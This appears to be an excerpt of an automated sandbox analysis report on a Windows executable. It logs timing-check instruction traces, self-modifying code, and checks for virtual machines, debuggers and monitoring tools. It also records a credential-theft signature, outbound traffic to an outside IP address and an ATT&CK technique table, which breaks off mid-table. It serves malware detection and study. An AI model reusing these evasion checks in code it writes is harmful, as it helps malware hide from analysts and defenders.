Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E000F second address: 71E009D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bx, ax 0x0000000e push ecx 0x0000000f jmp 00007FFBBCD9554Fh 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FFBBCD95554h 0x0000001e jmp 00007FFBBCD95555h 0x00000023 popfd 0x00000024 mov dl, ah 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b push esi 0x0000002c pop ebx 0x0000002d pushfd 0x0000002e jmp 00007FFBBCD95550h 0x00000033 adc esi, 0E3F2C58h 0x00000039 jmp 00007FFBBCD9554Bh 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E009D second address: 71E00C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dl, 1Ah 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E00C2 second address: 71E0137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFBBCD95557h 0x00000008 pop esi 0x00000009 mov dh, 6Ah 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e and esp, FFFFFFF0h 0x00000011 pushad 0x00000012 call 00007FFBBCD9554Eh 0x00000017 pushfd 0x00000018 jmp 00007FFBBCD95552h 0x0000001d and cl, FFFFFFA8h 0x00000020 jmp 00007FFBBCD9554Bh 0x00000025 popfd 0x00000026 pop ecx 0x00000027 mov cl, dl 0x00000029 popad 0x0000002a sub esp, 44h 0x0000002d jmp 00007FFBBCD95550h 0x00000032 xchg eax, ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov ax, bx 0x00000039 push ebx 0x0000003a pop esi 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E0137 second address: 71E013D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E013D second address: 71E0141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E0141 second address: 71E0165 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bh, 0Fh 0x0000000c mov edx, ecx 0x0000000e popad 0x0000000f xchg eax, ebx 0x00000010 jmp 00007FFBBCAD728Ch 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 mov edx, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b mov dh, cl 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E0165 second address: 71E0179 instructions: 0x00000000 rdtsc 0x00000002 mov dl, F9h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFBBCD9554Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E0179 second address: 71E01D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFBBCAD728Ch 0x00000009 or esi, 4DC7FC28h 0x0000000f jmp 00007FFBBCAD728Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, esi 0x00000019 jmp 00007FFBBCAD7296h 0x0000001e xchg eax, edi 0x0000001f jmp 00007FFBBCAD7290h 0x00000024 push eax 0x00000025 jmp 00007FFBBCAD728Bh 0x0000002a xchg eax, edi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E01D9 second address: 71E01DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E01DD second address: 71E01F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7297h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E01F8 second address: 71E0210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBBCD95554h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E0210 second address: 71E0214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E0214 second address: 71E027D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, dword ptr [ebp+08h] 0x0000000b jmp 00007FFBBCD95557h 0x00000010 mov dword ptr [esp+24h], 00000000h 0x00000018 jmp 00007FFBBCD95556h 0x0000001d lock bts dword ptr [edi], 00000000h 0x00000022 jmp 00007FFBBCD95550h 0x00000027 jc 00007FFC2CA87710h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FFBBCD9554Ah 0x00000036 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E027D second address: 71E0283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7210954 second address: 7210958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7210958 second address: 721095E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 721095E second address: 72109CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFBBCD95552h 0x00000009 xor eax, 16DF6C38h 0x0000000f jmp 00007FFBBCD9554Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FFBBCD95558h 0x0000001b adc ecx, 39456698h 0x00000021 jmp 00007FFBBCD9554Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FFBBCD95555h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7200851 second address: 7200855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7200855 second address: 720085B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 720085B second address: 7200872 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7200872 second address: 7200876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7200876 second address: 720087A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 720087A second address: 7200880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7200880 second address: 7200886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7200886 second address: 720088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 720088A second address: 720088E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 720088E second address: 72008D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FFBBCD9554Dh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FFBBCD9554Eh 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 call 00007FFBBCD9554Dh 0x0000001e pop ecx 0x0000001f jmp 00007FFBBCD95551h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72008D8 second address: 7200906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFBBCAD728Ah 0x00000009 jmp 00007FFBBCAD7295h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7200906 second address: 720090A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 720090A second address: 7200910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7200910 second address: 7200916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7210C10 second address: 7210C5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFBBCAD7291h 0x00000009 add eax, 386F7B86h 0x0000000f jmp 00007FFBBCAD7291h 0x00000014 popfd 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c jmp 00007FFBBCAD728Ah 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FFBBCAD728Ah 0x0000002c rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7210C5E second address: 7210C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7210C62 second address: 7210C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7210C68 second address: 7210CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFBBCD9554Ch 0x00000009 add cl, FFFFFF88h 0x0000000c jmp 00007FFBBCD9554Bh 0x00000011 popfd 0x00000012 jmp 00007FFBBCD95558h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+04h] 0x0000001d jmp 00007FFBBCD95550h 0x00000022 push dword ptr [ebp+0Ch] 0x00000025 jmp 00007FFBBCD95550h 0x0000002a push dword ptr [ebp+08h] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FFBBCD9554Dh 0x00000036 xor cx, 37B6h 0x0000003b jmp 00007FFBBCD95551h 0x00000040 popfd 0x00000041 mov ah, E1h 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7280A80 second address: 7280A85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7280A85 second address: 7280AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+10h] 0x0000000c jmp 00007FFBBCD9554Fh 0x00000011 and dl, 00000007h 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FFBBCD95554h 0x0000001b and al, FFFFFFD8h 0x0000001e jmp 00007FFBBCD9554Bh 0x00000023 popfd 0x00000024 call 00007FFBBCD95558h 0x00000029 mov cx, 3C11h 0x0000002d pop esi 0x0000002e popad 0x0000002f test eax, eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FFBBCD9554Fh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7280AFB second address: 7280B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7280B01 second address: 7280B08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7280B08 second address: 7280B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007FFC2C74C969h 0x0000000d jmp 00007FFBBCAD728Ah 0x00000012 sub ecx, ecx 0x00000014 jmp 00007FFBBCAD7291h 0x00000019 inc ecx 0x0000001a pushad 0x0000001b mov edi, esi 0x0000001d mov si, 0E2Fh 0x00000021 popad 0x00000022 shr eax, 1 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7280B43 second address: 7280B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7280B47 second address: 7280B4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7280B4B second address: 7280B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7280B51 second address: 7280B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7280B57 second address: 7280B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7260C48 second address: 7260C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7260C4C second address: 7260C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7260C52 second address: 7260C8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, C563h 0x00000007 pushfd 0x00000008 jmp 00007FFBBCAD7298h 0x0000000d sbb si, F7A8h 0x00000012 jmp 00007FFBBCAD728Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f mov cx, EE31h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7260C8E second address: 7260CE3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FFBBCD95555h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushad 0x00000014 mov dh, cl 0x00000016 mov al, dl 0x00000018 popad 0x00000019 jmp 00007FFBBCD95550h 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FFBBCD95557h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7260CE3 second address: 7260CE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7260CE9 second address: 7260CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7260CED second address: 7260CF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 727050C second address: 7270510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7270510 second address: 7270522 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7270522 second address: 727058E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFBBCD95556h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FFBBCD95550h 0x00000016 xchg eax, ebx 0x00000017 jmp 00007FFBBCD95550h 0x0000001c push eax 0x0000001d pushad 0x0000001e mov eax, edi 0x00000020 call 00007FFBBCD9554Dh 0x00000025 mov ah, EDh 0x00000027 pop edi 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov di, 0908h 0x00000031 mov edi, 0A21ADB4h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSpecial instruction interceptor: First address: D59058 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSpecial instruction interceptor: First address: D669B2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSpecial instruction interceptor: First address: DE6E0A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_01974ECE rdtsc 0_3_01974ECE
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004D255D
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004D29FF
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004D255D
Source: HrIrtCXI3s.exe, HrIrtCXI3s.exe, 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: HrIrtCXI3s.exeBinary or memory string: Hyper-V RAW
Source: HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: HrIrtCXI3s.exe, 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: HrIrtCXI3s.exe, 00000000.00000003.1974181847.000000000196C000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000002.2014537750.000000000196D000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1973750389.0000000001961000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1973460711.0000000001951000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1973498002.000000000195E000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1861876953.0000000001903000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeFile opened: NTICE
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeFile opened: SICE
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_01974ECE rdtsc 0_3_01974ECE
Source: HrIrtCXI3s.exe, HrIrtCXI3s.exe, 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 5.101.3.217:80
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
Process Injection
23
Virtualization/Sandbox Evasion
OS Credential Dumping751
Security Software Discovery
Remote Services11
Archive Collected Data
11
Encrypted Channel
